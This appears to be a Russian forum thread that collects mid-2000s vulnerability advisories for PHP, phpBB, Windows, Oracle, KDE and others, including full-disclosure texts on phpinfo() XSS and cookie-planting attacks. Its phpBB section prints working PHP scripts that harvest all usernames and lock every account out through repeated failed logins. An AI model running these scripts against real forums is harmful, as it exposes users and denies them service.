Утечка информации через information_schema в MySQL (information leak)
Тип:локальная
Описание:
Через SELECT * FROM information_schema.views пользователь может узнать запрос выполняемые при обращении к VIEW.
Затронутые продукты:MYSQL:MySQL 5.0
Утечка информации через information_schema в MySQL (information leak)
Тип:локальная
Описание:
Через SELECT * FROM information_schema.views пользователь может узнать запрос выполняемые при обращении к VIEW.
Затронутые продукты:MYSQL:MySQL 5.0
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки в kjs при декодировании URI в UTF-8 кодировке. Удаленный пользователь может вызвать переполнение динамической памяти с помощью специально сформированного URI, посредством браузера (Konqueror)и JavaScript кода, и выполнить произвольный код на целевой системе.
Решение: Установите исправление с сайта производителя.
KDE 3.4.0 - 3.5.0:
ftp://ftp.kde.org/pub/kde/security_p...elibs-kjs.diff
ecc0ec13ce3b06e94e35aa8e937e02bf
KDE 3.2.0 - 3.3.2:
ftp://ftp.kde.org/pub/kde/security_p...elibs-kjs.diff
9bca9b44ca2d84e3b2f85ffb5d30e047
Слабое шифрование в модуле perl Net::SSLeay (weak encryption)
Тип: локальная
Описание:
Если не задана переменная окружения EGD_PATH то для сбора энтропии используется файл /tmp/entropy. Атакующий может заполнить файл известными ему значениями.
Затронутые продукты: PERL:Net::SSLeay 1.25
Оригинальный текст
[Full-disclosure] [ MDKSA-2006:023 ] - Updated perl-Net_SSLeay packages fix vulnerability
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Утечка информации через память приложений MS-DOS в Microsoft Windows (information leak)
Тип: локальная
Описание:
Память не инициализируется при создании виртуального пространства для виртуальной DOS-машины, что позволяет прочитать содержимое памяти.
Затронутые продукты:
Windows 2000 Server
Windows 2000 Professional
Windows XP
Windows 2003 Server
Оригинальный текст
Windows mem leakage
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Программа:
Oracle9i Database Standard Edition
Oracle9i Database Enterprise Edition
Oracle9i Application Server
Oracle Application Server 10g
Oracle Database 8.x
Oracle HTTP Server 8.x
Oracle HTTP Server 9.x
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.
Уязвимость существует из-за ошибки в компоненте Gateway в Oracle PL/SQL при проверке подлинности определенных HTTP запросов. Удаленный пользователь может обойти ограничения списка PLSQLExclusion и получить доступ к запрещенным пакетам и процедурам с помощью специально сформированного HTTP запроса. Удачная эксплуатация уязвимости позволит злоумышленнику получить доступ с привилегиями DBA к базе данных посредством Web сервера.
Решение: Способов устранения уязвимости не существует в настоящее время.
Многочисленные ошибки в PHP (multiple bugs)
Описание:
Межсайтовый скриптинг в phpinfo(), возможность активизации register_globals со стороны клиента в parse_str(), возможность перезаписи переменной $GLOBALS через поле 'fileupload' запроса HTTP POST, а так же переменную через GLOBALS[variable].
Затронутые продукты:
PHP:PHP 5.0
PHP:PHP 4.4
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Межсайтовый скриптинг в phpinfo() - как то скудно ... нонс, выложи подробнее если найдешь... ЗЫ: в инет не отправлять...Сообщение от n0ns3ns3
Программа: Nullsoft Winamp 5.12 и более ранние версии
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Переполнение буфера обнаружено при обработке тега “File1” в “.pls” файлах. Удаленный пользователь может с помощью специально сформированного файла выполнить произвольный код на целевой системе.
Решение: Способов устранения уязвимости не существует в настоящее время.
PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable. (29.01.2006)Сообщение от s4SSn
[SA17763] PHP "mb_send_mail()" "To:" Header Injection Vulnerability (28.11.2005)
PHP Version 5.1.0 Update Fixes Several Vulnerabilities (26.11.2005)
[Full-disclosure] Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability (31.10.2005)
[Full-disclosure] Advisory 19/2005: PHP register_globals Activation Vulnerability in parse_str() (31.10.2005)
[Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo() (31.10.2005)
[Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hardened-PHP Project
www.hardened-php.net
-= Security Advisory =-
Advisory: PHP Cross Site Scripting (XSS) Vulnerability in phpinfo()
Release Date: 2005/10/31
Last Modified: 2005/10/31
Author: Stefan Esser [sesser@hardened-php.net]
Application: PHP4 <= 4.4.0
PHP5 <= 5.0.5
Severity: A Cross Site Scripting (XSS) Vulnerability in phpinfo()
could f.e. lead to cookie data exposure if an info
script is left on a production server.
Risk: Low
Vendor Status: Vendor has released a bugfixed PHP 4 version
References: http://www.hardened-php.net/advisory_182005.77.html
Overview:
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
During the development of the Hardening-Patch which adds security
hardening features to the PHP codebase, several vulnerabilities
within PHP were discovered. This advisory describes one of these
flaws concerning a weakness in the phpinfo() function, which allows
Cross Site Scripting (XSS).
Details:
The phpinfo() function outputs a large amount of information about
the current state of PHP. This includes information about PHP
compilation options and extensions, the PHP version, server
information and environment (if compiled as a module), the PHP
environment, OS version information, paths, master and local
values of configuration options and request variables, HTTP
headers, and the PHP License.
Because phpinfo() leaks a lot of information to the viewer it is
not recommended to leave a script executing phpinfo() on a
production server. However in reality phpinfo() scripts are left
open on a lot of servers. While this is already bad enough, there
is also a problem when request variables of a certain form are
displayed. With a properly crafted URL, that contains a stacked
array assignment it is f.e. possible to inject HTML code into the
output of phpinfo(), which could result in the leakage of domain
cookies (f.e. session identifiers).
Proof of Concept:
The Hardened-PHP project is not going to release exploits for any
of these vulnerabilities to the public.
Recommendation:
It is strongly recommended to never leave phpinfo() scripts on
production servers, additionally it is recommended to upgrade to
the new PHP-Releases as soon as possible, because it also fixes
a few vulnerabilities, that are rated critical. Finally we always
recommend to run PHP with the Hardening-Patch applied.
GPG-Key:
http://www.hardened-php.net/hardened...nature-key.asc
pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1
Copyright 2005 Stefan Esser. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFDZhz7RDkUzAqGSqERAt9xAJ9n80d64fyNFyeWWwEVns HfuyjE8wCeNgx3
OhyWy37m+0oH/xv6yIcNaCs=
=X39u
-----END PGP SIGNATURE-----
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Атака межсайтовых cookie (cross site cooking)
Описание:
Существует несколько возможностей установить Cookie для другого сайта.
Оригинальный текст:
[Full-disclosure] Cross Site Cooking
(Why, yes, I came up with the name, and had to find some bugs to be able
to post this.)
Summary
-------
There are three fairly interesting flaws in how HTTP cookies were
designed and later implemented in various browsers; these shortcomings
make it possible (and alarmingly easy) for malicious sites to plant
spoofed cookies that will be relayed by unsuspecting visitors to
legitimate, third-party servers.
Impact
------
Many commercial websites may be attacked to overwrite or delete
stored preferences, session identifiers, authentication data,
cart contents - with results ranging from minor annoyances to
a possibility of fraudulent activity, depending on site design
(bugs #1 and #2).
On sites where authentication data is tied on a server to a session ID,
the attacker may be able to acquire credentials by tricking the
visitor to authenticate within a session initiated by the attacker
(bugs #1 and #2)
Some websites may be susceptible to malicious-activity-by-proxy
attacks (bug #3).
There is no immediate universal threat to life as we know it, but
numerous web scripts are an easy target of specific variants of the
attacks described below.
Discussion
----------
Let's begin with a quick primer on cookie parsing: when a new cookie is
issued to the browser (via "Set-Cookie" header in a HTTP response), the
server is expected to specify the domain and URI for which the cookie is
meaningful. This mechanism is present so that pages could limit the
scope of their cookies if needed, and prevent the data from being sent
to unrelated addresses in the same domain. For security purposes, the
browser will (theoretically) reject a cookie that is set for a domain
that is either defined too broadly, or does not match issuer's location
at all.
(In other words, http://www.example.com/ may set a cookie that will be
sent to http://mail.example.com/, but not to http://forums.example.com/;
it cannot configure a cookie to be sent to all .com servers, nor to an
unrelated server, example.co.uk, however.)
Problem #1 - trouble with these pesky foreigners
------------------------------------------------
The mechanism for preventing overly relaxed cookie domain
specification seems to be broken in all major browsers. Some ancient
documents invoke the following flawed but reasonable rule:
"Two dots are required if the top level domain is: .COM, .EDU, .NET,
.ORG, .GOV, .MIL, or .INT. Three dots are required for any other
domain. This is to prevent the subdomain from being set to something
like .COM, the subdomain of all commercial machines."
[ http://www.ciac.org/ciac/bulletins/i-034.shtml ]
This is repeated ad nauseam in various cookie tutorials and FAQs,
but my initial tests indicate that the rule is quite simply not true.
Both MSIE and Firefox seem to be perfectly happy with two-period
ccTLDs domain cookies (.xxx.xx).
In other words, one can set a cookie for *.com.pl or *.com.fr, and
override or corrupt credentials or other parameters on hundreds of
thousands e-commerce websites in that country. It will be also
possible to plant attacker's session ID on visitor's computer,
and effectively, steal his credentials when he decides to sign in
on the target site.
Problem #2 - these cursed periods
---------------------------------
Another twist on the story is that there is no checking if there's
anything between periods in domain name - and extra trailing periods
are accepted by most resolvers as a way to override local domain
search path.
One can set a cookie for ".com.", then bounce the visitor to
http://www.victim.com./ . This address differs from the "real" one,
and thus, unlike with #1, planted cookies would work only for this
visit - but the trailing "." is not an alarming pattern for most
users. In fact, seasoned users recognize it and sometimes purposefully
append it - and as such, they won't be tempted to be suspicious, and
may interact with the website (perhaps even authenticate within
the session ID supplied by and known to the attacker).
A surprise of sorts... I'm not the first person to spot this:
http://www.nihongo.org/snowhare/utilities/triple_dot/ - credit
goes to Benjamin Franz... vendors were notified in 1998, and certainly
are not in a hurry to fix this.
Ok, let's go back to cookie handling for a while...
All the verification of domain path is limited to client-side; when
the server receives a cookie ("Cookie" header in a HTTP request), there
is no information about the original issuer. It is assumed that the
browser behaves rationally, and is sending the cookie to a site or a set
of sites that previously issued it. The only other option is that the
user willingly tampered with the request, and is OK with any eventual
consequences of his actions.
This is a mistake.
Problem #3 - it's the address that counts
-----------------------------------------
The attacker may easily force random visitors to accept and relay
arbitrary cookies to a third-party site by a) setting up
http://example.com; b) issuing all visitors a cookie that mimicks
victim's cookies, but is valid for *.example.com; c) setting IN A
record for evil.example.com to the IP address of its victim; d)
redirecting users to http://evil.example.com. This will cause
visitor's browser to send attacker's cookie to victim's server exactly
as if it were a cookie originally issued by the victim himself.
This trick alone does not compromise, disclose, erase, or supersede
user's settings should he later access the site through its proper
address; and since a bogus address is displayed in URL bar, the
user is not tempted to interact with the website. (There are some
brain-damaged examples of sessionID-in-URL redirects, but these
have a fair share of other problems.)
I do believe there is some risk, however: using this trick, a brand
new identity may be temporarily bestowed upon the user, and used to
perform certain undesirable or malicious tasks on the target site
before he has a chance to object (hiding attacker's identity or
bypassing IP-based limits). DDoS or session ID brute-forcing uses are
also tempting.
That said, this alone is not a major problem for a well-designed
website and a savvy user; alas, websites should be designed with the
knowledge of this possibility; and furhter research on specific
applications of this technique to existing backends might be quite
valuable.
Well... that's the story...
Solution
--------
Problem #1: There is no sane solution, other than altering HTTP cookie
format so that the server gets a chance to figure out who issued that
cookie in the first place. Workarounds by listing ccTLDs that use
.xxx.xx/.xx.xx subdomains in the browser are better than nothing
at all.
Problem #2: Browsers should strip "idle" periods in cookie
domain data. Browser vendors should take less than 8 years to address
security problems.
Problem #3: The immediate fix to this problem is requiring and carefully
validating HTTP/1.1 "Host" header on all requests (this ensures that the
browser's idea of who he's talking to matches the site's canonical
name).
Lame plug
---------
http://lcamtuf.coredump.cx/silence/
Cheers,
/mz
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Повышение привилегий через системные службы в Microsoft Windows (privilege escalation)
Описание:
Несколько системных служб (SSDP, uPnP) позволяют конфигурацию локальным пользователем, включая указание расположение исполняемого файла. Это позволяет получить привилегии локальной системы.
Затронутые продукты:
MICROSOFT:Windows XP
Windows Access Control Demystified
Hello everybody,
We have constructed a logical model of Windows XP access control, in a declarative but executable (Datalog)
format. We have built a scanner that reads access-control configuration information from the Windows
registry, file system, and service control manager database, and feeds raw configuration data to the model.
Therefore we can reason about such things as the existence of privilege-escalation attacks, and indeed we
have found several user-to-administrator vulnerabilities caused by misconfigurations of the access-control
lists of commercial software from several major vendors. We propose tools such as ours as a vehicle for
software developers and system administrators to model and debug the complex interactions of access control
on installations under Windows.
The full version of the paper can be found at:
http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf
All the vendors and CERT are aware of this paper. The bugs are *not*
remotely exploitable. The CERT id is VU#953860.
regards,
Sudhakar Govindavajhala and Andrew Appel.
Bio:
Sudhakar Govindavajhala is a finishing PhD student at Computer Science department, Princeton university.
His interests are computer security, operating systems and networks. Sudhakar is looking for employment
opportunities.
Andrew Appel is a Professor of Computer Science at Princeton University. He is currently on sabbatcal at
INRIA Rocquencourt. His interests are computer security, compilers, programming languages, type theory, and
functional programming.
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Программа: FreeBSD 5.3, 5.4
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Удаленный пользователь может вызвать отказ в обслуживании системы.
Уязвимость существует в реализации алгоритма выборочного подтверждения (SACK - Selective Acknowledgement) при обработке TCP пакетов. Удаленный пользователь может послать уязвимой системе специально сформированные TCP пакеты, вызвать зацикливание TCP/IP стека и потребить все доступные ресурсы на системе. Удачная эксплуатация уязвимости позволит злоумышленнику вызвать отказ в обслуживании системы.
Решение: Установите исправление с сайта производителя.
ftp://ftp.FreeBSD.org/pub/FreeBSD/CE...:08/sack.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CE...sack.patch.asc
Обнаружена уязвимость в Microsoft HTML Help Workshop
Обнаружена опасная уязвимость в Microsoft HTML Help Workshop v.4.74.8702.0(и предыдущих версиях). В результате ошибки обработки файла ".hpp" с длинным значением строковой переменой поля "Contents file" происходит переполнение буфера, которое может быть использовано злоумышленником с целью выполнения произвольного программного кода.
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Уязвимость в phpbb 2.0.19 (возможно более ранние версии)
Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).
Собирает в файл Ники всех пользователей форума.
Код:Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:PHP код:
$host="Сайт";
$papka="Папка с форумом";
$port=80;
$number_users=2050;
$start=1;
set_time_limit(0);
$file="user.txt";
$file=fopen($file,*w*);
for($i=$start;$i<=$number_users;$i++)
{$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
$request.="Accept-Language: ru\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$request.="Host: $host\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n\r\n";
$sock=fsockopen("$host",$port,$errno,$errstr);
fputs($sock,$request);
while(!feof($sock))
{$str=fgets($sock);
if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
{if(trim($return***91;1***93;)!=**)
{fputs($file,"$return***91;1***93;\n");
}}}}
fclose($file);
fclose($sock);
?>
1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле
то переписываем preg_match как
preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return))
Сам сплоит
Код:ЗащитаPHP код:
set_time_limit(0);
$host="Сайт";
$papka="Папка с форумом";
$file=fopen("user.txt",*r*);
while(!feof($file))
{
$str=fgets($file);
$str=trim($str);
for($i=0; $i<=5; $i++)
{
$request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
$request.="Referer: http://$host/$papka/login.php\r\n";
$request.="Accept-Language: ru\r\n";
$request.="Content-Type: application/x-www-form-urlencoded\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
$request.="Host: $host\r\n";
$request.="Content-Length: 73\r\n";
$request.="Pragma: no-cache\r\n";
$request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
$request.="\r\n";
$request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
$fp=fsockopen("$host",80,$errstr,$errno);
fputs($fp,$request);
fclose($fp);
}
}
?>
Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума.
securityinfo.ru
Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.
Программа: The Bat! 2.x
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю подменить заголовки в сообщениях.
Ошибка дизайна существует при отображении полученного сообщения. Удаленный пользователь может с помощью специально сформированного письма подменить оригинальные заголовки сообщения, включая сеть отправителя.
Решение: Установите последнюю версию (3.5) с сайта производителя.
Программа: MPlayer 1.0pre7try2, возможно более ранние версии.
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Целочисленное переполнение буфера существует в функциях "new_demux_packet()" файла "libmpdemux/demuxer.h" и "demux_asf_read_packet()" файла "libmpdemux/demux_asf.c" при распределении памяти для копирования данных из ".asf" файла. Удаленный пользователь может с помощью специально сформированного ".asf" файла вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.
Решение: Способов устранения уязвимости не существует в настоящее время.
Программа: phpBB 2.0.19, возможно более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
Решение: Способов устранения уязвимости не существует в настоящее время.
Программа: Linux kernel версии до 2.6.15.3
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.
Уязвимость существует из-за ошибки при создании ICMP ответа в функции "ip_options_echo()" в файле icmp.c. Удаленный пользователь может с помощью специально сформированного ICMP пакета, содержащего опции record-route или timestamp вызвать отказ в обслуживании системы.
Решение: Установите последнюю версию (2.6.15.3) с сайта производителя.
Программа:
JDK and JRE 5.0 Update 5 и более ранние версии
SDK and JRE 1.4.2_09 и более ранние версии
SDK and JRE 1.3.1_16 и более ранние версии
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать уязвимую систему.
Уязвимости существуют из-за неизвестных ошибок в "reflection" API. Злонамеренный апплет может обойти ограничения безопасности песочницы, прочитать и записать произвольные файлы, выполнить произвольные приложения на системе.
Решение: Установите исправленную версию с сайта производителя.
JDK and JRE 5.0:
Update to JDK and JRE 5.0 Update 6 or later.
http://java.sun.com/j2se/1.5.0/download.jsp
SDK and JRE 1.4.x:
Update to SDK and JRE 1.4.2_10 or later.
http://java.sun.com/j2se/1.4.2/download.html
SDK and JRE 1.3.x:
Update to SDK and JRE 1.3.1_17 or later.
http://java.sun.com/j2se/1.3/download.html
Программа: Openwall crypt_blowfish 0.4.7 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Нет
Описание:
Уязвимость позволяет удаленному пользователю получить доступ к потенциально важным данным на системе.
Уязвимость существует из-за ошибки в crypt_gensalt.c. Некоторые DES и MD5 хеши пароли могут быть сгенерированны с использованием одинаковых значений salt. Удачная эксплуатация уязвимости позволит злоумышленнику ускорить процесс подбора пароля.
URL производителя: www.openwall.com/crypt/
Решение: Установите последнюю версию (1.0) с сайта производителя.
Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)